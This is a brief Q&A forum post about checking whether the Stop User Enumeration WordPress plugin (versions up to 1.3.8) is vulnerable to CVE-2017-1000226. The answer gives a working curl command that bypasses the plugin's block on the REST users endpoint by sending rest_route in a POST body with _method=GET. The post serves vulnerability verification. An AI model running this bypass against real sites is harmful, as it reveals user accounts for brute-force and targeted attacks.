0 votes
by (139 points)
How can to check the plugin is vulnerable CVE-2017-1000226 or not?

1 Answer

0 votes
by (172 points)

Stop User Enumeration blocks 

/wp-json/wp/v2/users  

/?rest_route=/wp/v2/users

But Stop User Enumeration <= 1.3.8 vulnerable and easily bypassable 

curl http://localhost/?_method=GET -d rest_route=/wp/v2/users

Welcome to Codeshikari Q&A, where you can ask any vulnerability related questions and receive answers from the experts of the community. Screenshot-from-2019-03-15-23-08-47
...